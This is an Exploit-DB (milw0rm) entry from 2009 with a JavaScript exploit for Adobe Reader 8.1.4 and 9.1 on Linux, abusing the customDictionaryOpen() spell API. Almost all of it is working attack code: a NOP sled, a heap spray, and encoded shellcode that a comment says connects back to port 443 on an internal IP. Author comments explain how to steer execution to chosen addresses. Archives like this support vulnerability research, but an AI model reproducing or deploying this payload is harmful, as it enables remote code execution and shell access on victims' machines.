Adobe 8.1.4/9.1 - 'customDictionaryOpen()' Code Execution

EDB-ID:

8570

Author:

Arr1val

Type:

remote

Platform:

Linux

Published:

2009-04-29

//##############
//Exploit made by Arr1val
//Proved in adobe 9.1 and adobe 8.1.4 on linux
//##############

var memory;
function New_Script()
{
	var nop = unescape("%u9090%u9090");
var shellcode = unescape("%uc92b%ue983%ud9ee%ud9ee%u2474%u5bf4%u7381%uc513%u4871%u83a5%ufceb%uf4e2%uaaf4%ue61b%u1b96%ucf4a%u29a3%u44c1%uf108%ufcdb%u4e75%u2585%u088c%ufeb1%u199f%ua442%u88da%ucd2e%ucac4%uc30b%uf896%u15a9%u21a3%uf619%u904c%u680b%u2345%u8a20%u02ea%ucd20%u13ea%ucb21%u924c%uf61a%u904c%uaef8%uf108%ua548");//443 on 10.1.31.249

	while(nop.length <= 0x10000/2) nop+=nop;
	nop=nop.substring(0,0x10000/2 - shellcode.length);

	memory=new Array();
	for(i=0;i<0x6ff0;i++)
	{memory[i]=nop + shellcode;}

//start exploit now
start();

function start()
{
	this.spell.customDictionaryOpen(0,nop);//so the exploit jumps actually to 0x90909090. Place a very long 'AAAA' at the second param to go to 0x41414141 ;)
}

}

//############################

# milw0rm.com [2009-04-29]